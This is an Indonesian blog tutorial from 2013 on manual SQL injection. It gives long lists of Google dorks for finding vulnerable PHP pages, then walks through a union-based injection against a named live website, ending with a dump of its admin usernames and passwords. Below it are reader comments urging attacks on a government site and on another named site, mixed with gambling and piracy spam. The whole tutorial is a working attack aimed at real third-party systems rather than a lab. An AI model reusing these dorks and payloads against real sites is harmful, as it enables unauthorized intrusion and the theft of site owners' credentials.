Cara Hack Website Menggunakan Metode SQL Injection Manual - Hallo sobat 
Gimana kabarmu? (sok kenal banget) Semoga baik-baik saja ya
Gimana kabarmu? (sok kenal banget) Semoga baik-baik saja ya
Kali ini saya akan membagikan tutorial "Cara Hack Website Menggunakan Metode SQL Injection Manual"
Sebelumnya, mungkin ada sobat yang bertanya apa itu SQL INJECTION?
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error
Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url
| Contoh : http://Forbidden 007/berita.php?id=14’
http://Forbidden 007/berita.php?id=’14
|
Apabila terlihat pesan error seperti ini :
| You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1 |
Maka bisa dipastikan situs tersebut terdapat bug SQL Injection Dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR. Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection, XSS attack, ataupun mengenkripsi password md5 ataupun SHA-1
Dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR. Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection, XSS attack, ataupun mengenkripsi password md5 ataupun SHA-1
Hackbar bisa di dapat disini:
OK, Sekarang kita mulai SQL Injectionnya
Pertama yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork. Dorknya bisa dicari dibawah ini :
Pertama yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork. Dorknya bisa dicari dibawah ini :
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: filesize()
“id=” & intext:”Warning: require()
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: filesize()
“id=” & intext:”Warning: require()
WOW banyak banget Memang banyak sob, soalnya dork buat cari target itu nggak cukup 1 dan juga ngak sekali cari ketemu Sebenarnya dork itu banyak tapi kemunculan dork-dork baru tergantung kreatifitas individu masing-masing
Memang banyak sob, soalnya dork buat cari target itu nggak cukup 1 dan juga ngak sekali cari ketemu Sebenarnya dork itu banyak tapi kemunculan dork-dork baru tergantung kreatifitas individu masing-masing
Oke langsung saja Copas ( copy paste ) salah satu dork tersebut ke google search
Setelah itu kita pilih salah satu url dari hasil dork tersebut, contoh :
Setelah itu kita pilih salah satu url dari hasil dork tersebut, contoh :
| http://www.zenfocus.com/partners.php?id=2 |
Nah, sekarang kita test apakan vuln website tersebut dengan menambahkan tanda (‘) tanpa tanda kurung
teradapat BUG/VULN
Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali
| Contoh: http://www.zenfocus.com/partners.php?id=2 order by 1– no error http://www.zenfocus.com/partners.php?id=2 order by 2– no error http://www.zenfocus.com/partners.php?id=2 order by 3– no error http://www.zenfocus.com/partners.php?id=2 order by 4– no error http://www.zenfocus.com/partners.php?id=2 order by 5– no error http://www.zenfocus.com/partners.php?id=2 order by 6– no error http://www.zenfocus.com/partners.php?id=2 order by 7– error |
Eror Table ke 7
Berarti jumlah kolom pada database nya ada 6 kolom. Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injectio/tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda di depan angka.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda di depan angka.
| Contoh: http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5,6– |
Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya. Sekarang tahap selanjutnya ialah mengetahui versi databasenya. Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” ke dalam salah satu angka yang muncul tadi.
| Contoh: http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6– |
Nah, di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. Maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut.
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda --
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda --
| Contoh: http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- |
Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user, pass, dan admin terletak pada kolom administrator atau user. Tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “group_concat(table_name) ” dengan perintah “ column_name ” menjadi “group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “information_schema.tables “ dengan perintah “ .columns ” menjadi “information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ”.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “group_concat(table_name) ” dengan perintah “ column_name ” menjadi “group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “information_schema.tables “ dengan perintah “ .columns ” menjadi “information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ”.
Dan di ikuti hasil convert MySQL CHAR(), nah disini keuntungan dari kita memakai HACKBAR yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –> MySQL –> MySQL CHAR()
klik tombol SQL –> MySQL –> MySQL CHAR()
Setelah itu akan muncul JavaScript Aplication sebagai berikut:
Kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin. Contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok .
Kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin. Contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok .
Sehingga perintah kita menjadi :
| http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)– |
Setelah itu tekan Execute
Dan hasilnya
Dan hasilnya
Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3aadalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3aadalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
| http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin— |
Tekan Execute dan hasilnya
Setelah itu kita tinggal nyari admin loginnya
Sebenarnya banyak variasi sql injection yang laen, semunya tergantung sobat masing-masing mau pakai cara mana yang paling nyaman buat sobat
Sebenarnya banyak variasi sql injection yang laen, semunya tergantung sobat masing-masing mau pakai cara mana yang paling nyaman buat sobat
Anda baru saja membaca artikel yang berkategori Hacking /
Ilmu Pengetahuan
dengan judul Cara Hack Website Menggunakan Metode SQL Injection Manual. Anda bisa bookmark halaman ini dengan URL https://forbidden007.blogspot.com/2013/05/cara-hack-website-menggunakan-metode.html. Terima kasih!
Ditulis oleh:
wh0cares - Wednesday, May 22, 2013
wihh, adminnya hekell nih, takut ahh.. :D
ReplyDeletekunjungan baliknya sob.. :D
maho -_- OK sob :v
Deletenice post, om.. :)
ReplyDeletetpi, lebih mudah pake tool...
klo manual, susah + ribet....
tapi ada bagusnya juga sih, kita pake cara ini, agar kita tidak ketergantungan akan tool.. :)
very nicepost....
Hacking sistim manual lebih brilian n lebih gigit gitu.....mantaff....keren....lanjutkan bro
ReplyDeleteDitunggu lg posting lainx biar kita" yg awam bs ngerti....detil n jelas penjelasanx....
Salute......Salam kenal dr saya C^b.....
wow
ReplyDeleteMantaaapp
ReplyDeletehttp://Forbidden 007/berita.php?id=’14
ReplyDeleteemang harus ada angka di belakangnya ya ??
kalo ga ada gimana ??
(newbie)
Nyok kita hack situs pemerintah asutralia
ReplyDeleteGan , Kalau gk da pesan error gmna ?
ReplyDeletetolong beritahu caranya donk
Email Ke : syahfry@ymail.com
apa ini bikin pusink gk dpt uang cok huhh tai kucing nehh lapaarrr
ReplyDeleteThanks gan,... ane lagi belajar hack untuk sekedar ilmu pengetahuan....
ReplyDeleteGood Good
ReplyDeleteposting yang menggunakan HOIC , LOIC , HAVIJ , ROOTKIT , SQL , REAL HIDE IP .DLL
berbagi ilmu itu indah kawan :D
WE ARE ANONYMOUS
WE ARE LEGION
WE DO NOT FORGET
WE DO NOT FORGIVE
EXPECT US
nice bro ane ingin belajar gituan untuk ilmu saja :D (y)
ReplyDeletelg bljr utk nyoba2...
ReplyDeletethx yaaaaaa
alah cuma teori aja, coba kalau bisa hacking website saya.. ni security tingkat tinggi, bisa membobol dan menjatuhkan hebat gan
ReplyDeletenih websitenya http://perizinan.kelurahanpalam.com/login.php
ayo mana master hacker yang jago.. bobol tuh...
Gais kok suka error yang ane pengen hank gemsccol.com
ReplyDeleteGais kok suka error yang ane pengen hank gemsccol.com
ReplyDeletemantabb..nice info broo..
ReplyDeletenice broo
ReplyDeleteagen sbobet terpercaya
ReplyDeleteagen judi terpercaya
agen casino terpercaya
Mantap, gan!
ReplyDeleteShare tehnik yg lain lagi, gan. Yg pake https. Trus yg satunya lagi. Mmm, apa namanya, ya. Aduh mendadak lupa saya, mah. :)
Ada yang pernah berhasil belum kalau ada yg berhasil info gimana cara nya imel saya : ronnypaslan@gmail.com
ReplyDeletebanyak game gratis dan menarik http://waletbet99.com/
ReplyDeleteprediksi Bola Liga Inggris
prediksi Bola liga Prancis
prediksi Bola Germany
prediksi Bola Liga Italy
Prediksi Chievo vs Pescara
Daftar Sbobet Online
daftar waletbet99.com
ebetzone
Agen Casino Online
Agen Judi
very nice i likes it too thanks
ReplyDeleteทางเข้าsbo
บอลออนไลน์
Консоли от корпорации Microsoft не сразу захватили всемирную известность и доверие игроков. 1-ая консоль под названием Xbox, вышедшая в далеком 2001 году, значительно уступала PlayStation 2 по количеству проданных приставок. Однако все поменялось с выходом Xbox 360 - консоли седьмого поколения, которая стала по-настоящему "народной" для жителей Рф и государств СНГ - http://ru-xbox.ru/load/1/1/5. Интернет-сайт Ru-Xbox.Ru является пользующимся популярностью ресурсом в числе поклонников приставки, поскольку он предлагает игры для Xbox 360, которые поддерживают все имеющиеся версии прошивок - совершенно бесплатно! Зачем играть на оригинальном железе, в случае если есть эмуляторы? Для Xbox 360 игры выходили долгое время и представлены как посредственными проектами, так и хитами, многие из которых даже сегодня остаются уникальными для это консоли. Некоторые пользователи, желающие сыграть в игры для Xbox 360, смогут задать вопрос: для чего нужны игры для прошитых Xbox 360 freeboot или различными версиями LT, в случае если есть эмулятор? Рабочий эмулятор Xbox 360 хоть и существует, однако он просит производительного ПК, для покупки которого потребуется вложить существенную сумму. К тому же, всевозможные артефакты в виде исчезающих текстур, недостатка некоторых графических эффектов и освещения - смогут значительно испортить впечатления об игре и отбить желание для ее предстоящего прохождения. Что предлагает этот интернет-сайт? Наш портал вполне приурочен к играм для приставки Xbox 360. У нас вы можете совсем бесплатно и без регистрации скачать игры на Xbox 360 через torrent для следующих версий прошивок консоли: - FreeBoot; - LT 3.0; - LT 2.0; - LT 1.9. Каждая прошивка имеет свои особенности обхода интегрированной защиты. Потому, для запуска той либо другой игры потребуется загрузить специальную ее версию, которая вполне адаптирована под одну из 4 вышеперечисленных прошивок. На нашем сайте вы можете без труда получить желаемый проект под подходящую прошивку, так как возле каждой игры присутствует заглавие версии (FreeBoot, LT 3.0/2.0/1.9), под которую она адаптирована. Пользователям данного ресурса доступна особая категория игр для 360-го, созданных для Kinect - специального дополнения, которое считывает все движения одного либо нескольких игроков, и позволяет управлять с их помощью компьютерными персонажами. Большой выбор ПО Не считая способности загрузить игры на Xbox 360 Freeboot или LT различных версий, тут вы можете получить программное обеспечение для консоли от Майкрософт: - разные версии Dashboard, которые позволяют кастомизировать интерфейс консоли под свои нужды, сделав его более удобным и нынешним; - браузеры; - просмотрщики файлов; - сохранения для игр; - темы для консоли; - программы, для конвертации образов и записи их на диск. Помимо вышеперечисленного игры на Xbox 360 Freeboot можно запускать не с дисковых, а с USB и других носителей, используя программу x360key, которую можно достать на нашем веб-сайте. Посетителям доступно множество полезных статей, а кроме этого форум, где вы можете пообщаться с единомышленниками или попросить совета у более опытных владельцев консоли.
ReplyDeleteYour car could be stolen if you don't remember this!
ReplyDeleteConsider that your car was taken! When you visit the police, they inquire about a particular "VIN check"
A VIN decoder: What is it?
Similar to a passport, the "VIN decoder" allows you to find out when the car was born and who its "parent"( manufacturing plant) is. You can also find out:
1.Type of engine
2.Model of a vehicle
3.The DMV's limitations
4.Number of drivers in this vehicle
You'll be able to locate the car, and keeping in mind the code ensures your safety. The code can be viewed in the online database. The VIN is situated on various parts of the car to make it harder for thieves to steal, such as the first person's seat on the floor, the frame (often in trucks and SUVs), the spar, and other areas.
What if the VIN is intentionally harmed?
There are numerous circumstances that can result in VIN damage, but failing to have one will have unpleasant repercussions because it is illegal to intentionally harm a VIN in order to avoid going to jail or calling the police. You could receive a fine of up to 80,000 rubles and spend two years in prison. You might be stopped by an instructor on the road.
Conclusion.
The VIN decoder may help to save your car from theft. But where can you check the car reality? This is why we exist– VIN decoders!
БК MelBet пользуется большой популярностью сегодня на российском рынке: -Деятельность компании лицензирована; - Игрокам предоставлен впечатляющий перечень ставок - в формате live и предматчевых; - Тут нет задержек с выплатами. Линия ставок невероятно презентабельна. Для того, чтобы получить прибыльный бонус на совершение ставок, требуется всего только использовать промокод MelBet RS777. Получить промокод вы можете на ставку или на депозит. Каждое предложение имеет свои особенности отыгрыша - рабочий промокод Мелбет.
ReplyDeleteСистема бонусов и поощрений в БК 1хбет значительно увеличивает привлекательность компании в глазах игроков. Очень выгодные предложения доступны и новичкам, и пользователям, уже имеющим опыт работы на платформе. Среди впечатляющего ассортимента бонусной программы очень легко потеряться. Каждый промокод 1хбет обеспечивает право на определенные преференции - промокод 1х бет.
ReplyDelete